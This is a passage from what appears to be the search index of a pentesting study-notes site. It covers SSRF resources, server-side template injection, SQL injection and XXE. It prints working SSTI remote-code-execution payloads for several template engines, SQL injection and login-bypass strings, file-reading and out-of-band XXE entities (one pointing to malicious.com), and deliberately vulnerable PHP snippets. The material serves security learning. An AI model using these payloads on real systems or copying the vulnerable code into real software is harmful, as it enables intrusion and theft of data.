                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#resources","title":"Resources","text":"
                        • Portswigger: https://portswigger.net/web-security/ssrf.
                        • Portswigger labs.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        • Gopherus.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/","title":"Server-side Template Injection (SSTI)","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#what-is-ssti","title":"What is SSTI?","text":"

                        Web applications frequently use template systems to embed dynamic content in web pages and emails.

                        For instance, ASP framework (Razor), PHP framework (Twig, Symfony, Smarty, Laravel, Slim, Plates), Python frameworks (django, mako, jinja2), Java frameworks (Groovy, Freemarker, Jinjava, Pebble, Thymeleaf, Velocity, Spring, patTemplate, Expression Language EL), Javascript frameworks (Handlebars, Codepen, Lessjs, Lodash), Ruby framework (ERB, Slim).

                        Server-side Template Injection vulnerabilities (SSTI) occur when user input is trusted when embedding a template, which is an unsafe implementation and might lead to remote code execution on the server.

                        OWASP

                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.18. Testing for Server-side Template Injection

                        ID Link to Hackinglife Link to OWASP Description 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit. Resources for these notes
                        • Portswigger: Server-Side Template Injection
                        • Hacktricks: SSTI payloads
                        Payloads
                        • PayloadsAllTheThings for SSTI

                        Snipped of vulnerable source code:

                        custom_email={{self}}\n

                        What we have here is essentially server-side code execution inside a sandbox. Depending on the template engine used, it may be possible execute arbitrary code directly or even to escape the sandbox and execute it. Following the example, in this POST request the expected email value has been replaced by a payload and it gets executed:

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#exploitation","title":"Exploitation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#1-detect-injection-points","title":"1. Detect injection points","text":"

                        Template languages use syntax chosen explicitly not to clash with characters used in normal HTML, so it's easy for a manual blackbox security assessment to miss template injection entirely.\u00a0To detect it, we need to invoke the template engine by embedding a statement.

                        Here\u2019s a simple example of using Twig in a PHP application. This would be the exampletemplate.twig:

                        <!DOCTYPE html>  \n<html>  \n<head>  \n    <title>{{ title }}</title>  \n</head>  \n<body>  \n    <h1>Hello, {{ name }}!</h1>  \n</body>  \n</html>\n

                        And the PHP rendering the Twig template:

                        <?php  \nrequire_once 'example/page.php';  \n\n$loader = new \\Twig\\Loader\\FilesystemLoader(__DIR__);  \n$twig = new \\Twig\\Environment($loader);  \n\n$template = $twig->load('exampletemplate.twig');  \necho $template->render(['title' => 'Twig Example', 'name' => 'John']);  \n?>\n

                        Now, coming back to our web app, we could curl the following:

                        $ curl -g 'http://www.target.com/page?name={{7*7}}'\n

                        With SSTI the response would be:

                        Hello 49!\n

                        Trick:There are a huge number of template languages but many of them share basic syntax characteristics. We can take advantage of this by sending generic, template-agnostic payloads using basic operations to detect multiple template engines with a single HTTP request. This polyglot payload will trigger an error in presence of a SSTI vulnerability:

                        ${{<%[%'\"}}%\\.\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#2-identify-the-template-engine","title":"2. Identify the template engine","text":"

                        After detecting template injection, the next step is to identify the template engine in use.

                        Green and red arrows represent 'success' and 'failure' responses respectively. In some cases, a single payload can have multiple distinct success responses - for example, the probe\u00a0{{7*'7'}}\u00a0would result in 49 in Twig, 7777777 in Jinja2, and neither if no template language is in use.

                        Payloads for different Template engines
                        • PayloadsAllTheThings for SSTI
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#3-exploitation","title":"3. Exploitation","text":"

                        Once you discover a server-side template injection vulnerability, and identify the template engine being used, successful exploitation typically involves the following process.

                        • Read

                          • Template syntax
                          • Security documentation
                          • Documented exploits
                        • Explore the environment:

                        Many template engines expose a \"self\" or \"environment\" object of some kind, which acts like a namespace containing all objects, methods, and attributes that are supported by the template engine. If such an object exists, you can potentially use it to generate a list of objects that are in scope.

                        It is important to note that websites will contain both built-in objects provided by the template and custom, site-specific objects that have been supplied by the web developer. You should pay particular attention to these non-standard objects

                        • Create a custom attack
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#1-java-frameworks","title":"1. Java frameworks","text":"

                        Many template engines expose a \"self\" or \"environment\" object. In Java-based templating languages, you can sometimes list all variables in the environment using the following injection:

                        ${T(java.lang.System).getenv()}\n

                        This can form the basis for creating a shortlist of potentially interesting objects and methods to investigate further. Additionally, for Burp Suite Professional users, the Intruder provides a built-in wordlist for brute-forcing variable names.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#11-freemarker","title":"1.1. FreeMarker","text":"

                        Basic payloads:

                        {{7*7}}\n# return {{7*7}}\n\n${7*7}\n#return 49\n\n#{7*7}\n#return 49 -- (legacy)\n\n${7*'7'}\n#return nothing\n

                        RCE in FreeMarker:

                        <#assign ex = \"freemarker.template.utility.Execute\"?new()>${ ex(\"id\")}\n[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}\n${\"freemarker.template.utility.Execute\"?new()(\"id\")}\n\n${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(\" \")}\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#12-velocity","title":"1.2. Velocity","text":"

                        RCE in Velocity:

                        $class.inspect(\"java.lang.Runtime\").type.getRuntime().exec(\"sleep 5\").waitFor()   \n\n[5 second time delay]   \n0\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#2-php-frameworks","title":"2. PHP frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#21-smarty","title":"2.1. Smarty","text":"

                        RCE in Smarty

                        {php}echo `id`;{/php}\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#3-python-frameworks","title":"3. Python frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#31-mako","title":"3.1. Mako","text":"

                        RCE in Mako

                        <%   import os   x=os.popen('id').read()   %>   ${x}\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#32-tornado","title":"3.2. Tornado","text":"

                        Basic payloads:

                        {{7*7}}\n# return 49\n\n${7*7}\n# return ${7*7}\n\n{{foobar}}\n#return Error\n\n{{7*'7'}}\n# return 7777777\n

                        RCE in Tornado:

                        {{os.system('whoami')}}\n\n\n{% import os %}{{ os.popen(\"whoami\").read() }}\n

                        Useful tips to create SSTI exploit for Tornado:

                        • Anything coming between\u00a0{{\u00a0and\u00a0}}\u00a0are evaluated and send back to the output.

                        {{ 2*2 }}\u00a0-> 4

                        • {% import module %} - Allows you to import python modules.

                        {% import subprocess %}

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#4-ruby-frameworks","title":"4. Ruby frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#41-erb","title":"4.1. ERB","text":"

                        Basic injection:

                        <%= 7 * 7 %>\n

                        Retrieve /etc/passwd

                        <%= File.open('/etc/passwd').read %>\n

                        List files and directories

                        <%= Dir.entries('/') %>\n\n\n<%= File.open('/example/arbitrary-file').read %>\n

                        Code execution

                        <%= system('cat /etc/passwd') %>\n<%= `ls /` %>\n<%= IO.popen('ls /').readlines()  %>\n<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>\n<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#tools","title":"Tools","text":"
                        • Tplmap
                        • Backslash Powered Scanner Burp Suite extension
                        • Template expression test strings/payloads list
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#related-lab","title":"Related lab","text":"

                        HackTheBox: Nunchunks: Express server with a nunjucks template engine.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/","title":"Session Puzzling - Session Variable Overloading","text":"

                        Owasp vuln description: https://owasp.org/www-community/vulnerabilities/Session_Variable_Overloading.

                        Session Variable Overloading (also known as Session Puzzling, or Temporal Session Race Conditions) is an application level vulnerability which can enable an attacker to perform a variety of malicious actions. This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set one one context and then used in another.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/#demo","title":"Demo","text":"

                        From 2011!!!!!!

                        <iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/-DackF8HsIE\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/","title":"SQL injection","text":"

                        SQL stands for Structure Query Language. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database: to view data, to retrieve it, to modify it, to delete it, to compromise the infrastructure with what is known for instance as a denial of service attack.

                        A detailed SQLi Cheat sheet for manual attack.

                        OWASP

                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

                        ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. Sources for these notes
                        • My Ine: eWPTv2.
                        • Hacktricks.
                        • OWASP: WSTG Testing for SQL injection.
                        • Notes during the Cibersecurity Bootcamp at The Bridge.
                        • Experience pentesting applications.
                        Languages and dictionaries Server Dictionary MySQL MySQL payloads. MSSQL MSSQL payloads. PostgreSQL PostgreSQL payloads. Oracle Oracle SQL payloads. SQLite SQLite payloads. Cassandra Cassandra payloads. Attack-based dictionaries
                        • Generic SQL Injection Payloads
                        • Generic Error Based Payloads.
                        • Generic Union Select Payloads.
                        • SQL time based payloads .
                        • SQL Injection Auth Bypass Payloads
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#how-does-sql-injection-work","title":"How does SQL injection work?","text":"

                        1. Retrieving hidden data

                        Examples at a shopping application

                        Request URL SQL Query Explained http://insecure-website.com/products?category=Gifts SELECT * FROM products WHERE category='Gift' AND release=1 Restriction \"released\" is being used to hide products that are not released. Unreleased products will be presumably released=0 http://insecure-website.com/products?category=Gifts'-- SELECT * FROM products WHERE category='Gift'--' AND released=1 Explained: Double dash sequence -- is a comment indicator in SQL which means that the rest of the query is interpretated as a comment. The application will display all the products in a category, being released or not. https://insecure-website.com/products?category=Gifts'+OR+1=1-- SELECT * FROM products WHERE category='Gifts' OR 1=1--' AND released=1 This will return all items where category is Gifts, or 1=1. Since 1=1 is always true, the query will return all items.

                        2. Subverting application logic

                        Request URL SQL Query Explained Login SELECT * FROM users WHERE username=\"admin\" AND password=\"lalalala\" Login process, probably with a POST method Login: Adding admin'-- in the username and '' in the password field SELECT * FROM users where username=\"admin'-- AND password='' This query returns the user whose name is admin and succesfully logs the attacker as that user.","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#clasification","title":"Clasification","text":"

                        SQLi (for SQL injection) typically falls under three categories.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#1-in-band-sqli-or-classic-sql-injection","title":"1. In-band SQLi / or Classic SQL injection","text":"

                        In-band SQL injection is the most common type of SQL injection attack. It occurs when an attacker uses the same communication channel to send the attack and receive the results. In other words, the attacker injects malicious SQL code into the web application and receives the results of the attack through the same channel used to submit the code. In-band SQL injection attacks are dangerous because they can be used to steal sensitive information, modify or delete data, or take over the entire web application or even the entire server. Attacks are sent from the same channel in which results are collected.

                        In-band SQL injection can be further divided into two subtypes/exploitation techniques:

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#11-error-based-sqli","title":"1.1. Error-based SQLi","text":"

                        Error-based SQL injection: In error-based SQL injection, the attacker injects SQL code that causes the web application to generate an error message. The error message can contain valuable information about the database schema or the contents of the database itself, which the attacker can use to further exploit the vulnerability.

                        The attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#12-union-based-sqli","title":"1.2. Union-based SQLi","text":"

                        The UNION operator is used in SQL to combine the results of two or more SELECT statements into a single result set. Therefore, it requires that the number of columns and their data types match in the SELECT statements being combined.

                        Union-based SQL injection: In union-based SQL injection, the attacker injects additional SELECT statements through the vulnerable input. By manipulating the injected SQL code, the attacker can extract data from the database that they are not authorized to access.

                        Here's an example to illustrate the concept. Consider the following vulnerable code snippet:

                        SELECT id, name FROM users WHERE id = '<user_input>'\n

                        An attacker can exploit this vulnerability by injecting a UNION-based attack payload into the parameter. They could inject a statement like:

                        ' UNION SELECT credit_card_number, 'hack' FROM credit_cards --\n

                        The injected payload modifies the original query to retrieve the credit card numbers along with a custom value ('hack') from the credit_cards table. The double dash at the end is used to comment out the remaining part of the original query.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#2-inferential-blind-sqli","title":"2. Inferential (Blind) SQLi","text":"

                        Blind SQL Injection is a type of SQL Injection attack where an attacker can exploit a vulnerability in a web application that does not directly reveal information about the database or the results of the injected SQL query. In this type of attack, the attacker injects malicious SQL code into the application's input field, but the application does not return any useful information or error messages to the attacker in the response. The attacker typically uses various techniques to infer information about the database, such as time delays or Boolean logic. The attacker may inject SQL code that causes the application to delay for a specified amount of time, depending on the result of a query.

                        Blind SQL injection can be further divided into two subtypes/exploitation techniques:

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#21-boolean-based-content-based-blind-sqli","title":"2.1. Boolean-based (content-based) Blind SQLi","text":"

                        Boolean-based SQL Injection: In this type of attack, the attacker exploits the application's response to boolean conditions to infer information about the database. The attacker sends a malicious SQL query to the application and evaluates the response based on whether the query executed successfully or failed.

                        Inferential SQL injection technique that relies on sending a SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

                        See this example:

                        ' OR LENGTH(database()) > 5--\n

                        This payload test whether the length of the database name is greater than 5 characters. Afterwards, you can start testing each character and, therefore, retrieve the name of the database.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#22-time-based-blind-sqli","title":"2.2. Time-Based Blind SQLi","text":"

                        Time-based Blind Injection: In this type of attack, the attacker exploits the application's response time to infer information about the database. The attacker sends a malicious SQL query to the application and measures the time it takes for the application to respond.

                        If you don't get a TRUE or FALSE response, sometimes you may infer if it is TRUE or FALSE based on time of response. Time-based SQL injection is a inferential SQL injection technique that relies on sending a SQL query to the database, which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#3-out-of-band-sqli","title":"3. Out-of-Band SQLi","text":"

                        Out-of-band SQL Injection is the least common type of SQL injection attack. It involves an attacker exploiting a vulnerability in a web application to extract data from a database using a different channel, other than the web application itself. Unlike in-band SQL Injection, where the attacker can observe the result of the injected SQL query in the application's response, out-of-band SQL Injection does not require the attacker to receive any response from the application. The attacker can use various techniques to extract data from the database, such as sending HTTP requests to an external server controlled by the attacker or using DNS queries to extract data.

                        It's used when an attacker is unabled to use the same channel to launch the attack and gather results. Out-of-band SQLi techniques would rely on the database server's ability to make DNS or HTTP request to deliver data to an attacker.

                        Such is the case of Microsoft SQL Server's xp_dirtree command, which can be used to make DNS request to a server that an attacker controls, as well as Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL ti a server that an attacker controls.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#databases","title":"Databases","text":"

                        In computing, a database is typically managed by a Database Management System (DBMS) that provides a set of tools and interfaces to interact with the data. DBMS stands for \"Database Management System\". It is a software system that enables users to create, store, organize, manage, and retrieve data from a database.

                        DBMS provides an interface between the user and the database, allowing users to interact with the database without having to understand the underlying technical details of data storage, retrieval, and management. DBMS provides various functionalities such as creating, deleting, modifying, and querying the data stored in the database. It also manages security, concurrency control, backup, recovery, and other important aspects of data management.

                        Types of databases:

                        • Relational Databases - A database that organizes data into one or more tables or relations, where each table represents an entity or a concept, and the columns of the table represent the attributes of that entity or concept. SQL databases are relational databases that store data in tables with rows and columns, and use SQL (Structured Query Language) as their standard language for managing data. They enforce strict data integrity rules and support transactions to ensure data consistency. SQL databases are widely used in applications that require complex data queries and the ability to handle large amounts of structured data. Some examples of SQL databases include MySQL, Oracle, Microsoft SQL Server, and PostgreSQL.
                        • NoSQL Databases - A type of database that does not use the traditional tabular relations used in relational databases. Instead, NoSQL databases use a variety of data models to store and access data.
                        • Object-oriented Databases - A database that stores data as objects rather than in tables, allowing for more complex data structures and relationships.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#1-rdbms-relational-database-management-system","title":"1. RDBMS - Relational Database Management System","text":"

                        RDBMS stands for Relational Database Management System. It is a software system that enables the creation, management, and administration of relational databases. RDBMSs are designed to store, organize, and retrieve large amounts of structured data efficiently. RDBMSs provide a set of features and functionalities that allow users to create database schemas, define relationships between tables, insert, update, and retrieve data, and perform complex queries using SQL. They also handle aspects like data security, transaction Management, and concurrency control to ensure data integrity and consistency.

                        The following are examples of popular DBMS (Database Management Systems):

                        • MySQL - A free, open-source relational database management system that is widely used for web applications.
                        • PostgreSQL - Another popular open-source relational database management system that is known for its advanced features and reliability.
                        • Oracle Database - A commercial relational database management system developed by Oracle Corporation that is widely used in enterprise applications.
                        • Microsoft SQL Server - A commercial relational database Management system developed.

                        How relational databases work:

                        • Tables: The basic building blocks of a relational database are tables, also known as relations. A table consists of rows (also called records or tuples) and columns (also known as attributes). Each row represents a unique record or instance of an entity, and each column represents a specific attribute or characteristic of that entity.

                        • Keys: Keys are used to uniquely identify records within a table and establish relationships between tables. The primary key is a column or set of columns that uniquely identifies each row in a table. It ensures the integrity and uniqueness of the data. Foreign keys are columns in one table that reference the primary key of another table, establishing relationships between the tables.

                        • Relationships: Relationships define how tables are connected or associated with each other. Common types of relationships include one-to-one, one-to-many, and many-to-many. These relationships are established using primary and foreign keys, allowing data to be linked and retrieved across multiple tables.

                        • Structured Query Language (SQL): Relational databases are typically accessed and manipulated using the Structured Query Language (SQL). SQL provides a standardized language for querying, inserting, updating, and deleting data from relational databases. It allows users to perform operations such as retrieving specific records, filtering data based on conditions, joining tables to combine data, and aggregating data using functions.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#2-nosql","title":"2. NoSQL","text":"

                        [NoSQL] (Not Only SQL) databases are a type of database management system that differ from traditional relational databases (RDBMS) in terms of data model, scalability, and flexibility. NoSQL databases are designed to handle large volumes of unstructured, semi-structured, and rapidly changing data. NoSQL databases are commonly used in modern web applications, big data analytics, real-time streaming, content management systems, and other scenarios where the flexibility, scalability, and performance advantages they offer are valuable.

                        There are several popular NoSQL databases available, each with its own strengths and use cases. Here are some examples of well-known NoSQL databases:

                        • MongoDB: MongoDB is a document database that stores data in flexible, JSON-like documents. It provides scalability, high performance, and rich query capabilities. MongoDB is widely used in web applications, content management systems, and real-time analytics. It uses MQL (MongoDB Query Language).
                        • Redis: Redis is an in-memory data store that supports various data structures, including strings, hashes, lists, sets, and sorted sets. It is known for its exceptional performance and low latency. Redis is often used for caching, real-time analytics, session management, and pub/sub messaging.
                        • Amazon DynamoDB.
                        • CouchBase Server.
                        • Apache Cassandra: Distributed columnar database designed to handle large amounts of data across multiple commodity servers. It offers hight availability, fault tolerance, and linear scalability,
                        • Apache HBase.
                        • Riak.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#how-web-applications-utilize-sql-queries","title":"How web applications utilize SQL queries","text":"

                        The following code contains a PHP example of a connection to a MySQL database and the execution of a SQL query.

                        $dbhostname='1.2.3.4';\n$dbuser='username';\n$dbpassword='password';\n$dbname='database';\n\n$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);\n$query = \"SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT Username, Password FROM Accounts;\";\n\n$results = mysqli_query($connection, $query);\ndisplay_results($results);\n

                        Most of the times queries are not static; they are indeed dynamically built by using user' inputs. Here you can find a vulnerable dynamic query example:

                        $id = $_GET['id'];\n\n$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);\n$query = \"SELECT Name, Description FROM Products WHERE ID='$id';\";\n\n$results = mysqli_query($connection, $query);\ndisplay_results($results);\n

                        If an attacker crafts an $id value which can actually change the query, like:

                        ' OR 'a'='a\n

                        Then the query becomes:

                        SELECT Name, Description FROM Products WHERE ID='' OR 'a'='a';\n

                        This tells the database to select the items by checking two conditions:

                        • The id must be empty (id='') OR an always true condition ('a'='a\u2019)
                        • While the first condition is not met, the SQL engine will consider the second condition of the OR. This second condition is crafted as an always true condition.

                        In other words, this tells the database to select all the items in the Products table.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#common-injectable-fields","title":"Common injectable fields","text":"

                        SQL injection vulnerabilities can exist in various input fields within an application.

                        • Login forms: The username and password fields in a login form are common targets for SQL injection attacks.
                        • Search boxes: Input fields used for searching within an application are potential targets for SQL injection. If the search query is directly incorporated into a SQL statement without proper validation, an attacker can inject malicious SQL code to manipulate the query and potentially access unauthorized data.
                        • URL parameters: Web applications often use URL parameters to pass data between pages. If the application uses these parameters directly in constructing SQL queries without proper validation and sanitization, it can be susceptible to SQL injection attacks.
                        • Form fields: Any input fields in forms, such as registration forms, contact forms, or comment fields, can be vulnerable to SQL injection if the input is not properly validated and sanitized before being used in SQL queries.
                        • Hidden fields: Hidden fields in HTML forms can also be susceptible to SQL injection attacks if the data from these fields is directly incorporated into SQL queries without proper validation.
                        • Cookies: In some cases, cookies containing user data or session information may be used in SQL queries. If the application does not validate or sanitize the cookie data properly, it can lead to SQL injection vulnerabilities.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        • Detailed Cheat sheet with manual union and blind attacks can be found in the SQLi Cheat sheet for manual attack.

                        • https://portswigger.net/web-security/sql-injection/cheat-sheet.

                        • https://github.com/payloadbox/sql-injection-payload-list.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/xml-external-entity-xee/","title":"XXE - XEE XML External Entity attacks","text":"Sources
                        • HackTricks.
                        • Portsqigger.
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#basic-concepts","title":"Basic concepts","text":"","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-it-xml","title":"What it XML?","text":"

                        XML stands for \"extensible markup language\". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-entities","title":"What are XML entities?","text":"

                        XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities < and > represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-elements","title":"What are XML elements?","text":"

                        Element type declarations set the rules for the type and number of elements that may appear in an XML document, what elements may appear inside each other, and what order they must appear in. For example:

                        <!ELEMENT root ANY> Means that any object could be inside the parent <root></root>\n\n<!ELEMENT root EMPTY> Means that it should be empty <stockCheck></stockCheck>\n\n<!ELEMENT root (name,password)> Declares that <root> can have the children <name> and <password>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-is-document-type-definition","title":"What is document type definition?","text":"

                        The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an \"internal DTD\") or can be loaded from elsewhere (known as an \"external DTD\") or can be hybrid of the two.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#how-xml-custom-entities-work","title":"How XML custom entities work?","text":"

                        XML allows custom entities to be defined within the DTD. For example:

                        <!DOCTYPE foo [ <!ENTITY myentity \"my entity value\" > ]>\n

                        This definition means that any usage of the entity reference &myentity; within the XML document will be replaced with the defined value: \"my entity value\".

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-external-entities","title":"What are XML external entities?","text":"

                        XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared. The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:

                        <!DOCTYPE foo [ <!ENTITY ext SYSTEM \"http://normal-website.com\" > ]>\n

                        The URL can use the file:// protocol, and so external entities can be loaded from file. For example:

                        <!DOCTYPE nameThatYouWant [ <!ENTITY nameofEntity SYSTEM \"file:///path/to/file\" > ]>\n<root>\n    <name>&nameofEntity;</name>\n    <password>1</password>\n</root>\n\n# nameThatyouWant: string with the name that you want\n# nameofEntity: we will call the entity using this name. It\n# <!ENTITY: There might be more than one entity defined\n# SYSTEM: allow us to call the entity\n# file:// -> To call an internal value. But instead of file we can call:\n    # http://\n    # ftp://\n    # ssh://\n    # php://\n# &nameofEntity;  -> This is how you request the object\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#classic-xml-external-entity","title":"Classic XML External Entity","text":"
                        # Classic XXE\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\" > ]>\n<name>&nameofEntity;</name>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#base-encoded-xml-external-entity","title":"Base-encoded XML External Entity","text":"
                        # Base encoded XXE\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=file:///etc/passwd\" > ]>\n<name>&nameofEntity;</name>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#blind-xml-external-entity-out-of-band","title":"Blind XML External Entity - Out of Band","text":"
                        # Blind XXE 1\n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> %xxe; ]>\n
                        # Blind XXE 2\n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://malicious.com/exploit\"> %xxe; ]>\n\n    # http://malicious.com/exploit will contain another entity such as \n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> %xxe; ]>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#but-why-external-entities-are-accepted","title":"But why external entities are accepted","text":"

                        This is a snipped of a PHP code that accept extenal DTDs

                        <?php\n\nlibxml_disable_entity_loader (false);\n// libxml_disable_entity_loader (true);\n\n$xmlfile = file_get_contents('php://input');\n$dom = new DOMDocument();\n$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);\n$info = simplexml_import_dom($dom);\n$name = $info->name;\n$password = $info->password;\n\necho \"Sorrym this $name is not available\";\n?>\n

                        Allowing external DTDs is done in line:

                        libxml_disable_entity_loader (false);\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#main-attacks","title":"Main attacks","text":"","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#new-entity-test","title":"New Entity test","text":"

                        In this attack I'm going to test if a simple new ENTITY declaration is working:

                        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE foo [<!ENTITY toreplace \"3\"> ]>\n<stockCheck>\n    <productId>&toreplace;</productId>\n    <storeId>1</storeId>\n</stockCheck>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#1-retrieve-files","title":"1. Retrieve files","text":"

                        Modify the submitted XML in two ways:

                        • Introduce (or edit) a\u00a0DOCTYPE\u00a0element that defines an external entity containing the path to the file.
                        • Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

                        In a windows system, we may use c:/windows/system32/drivers/etc/hosts:

                        POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 192\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/system32/drivers/etc/hosts'>]>\n<order>\n    <quantity>2</quantity>\n    <item>&test;</item>\n    <address>1</address>\n</order>\n

                        In a Linux server go for

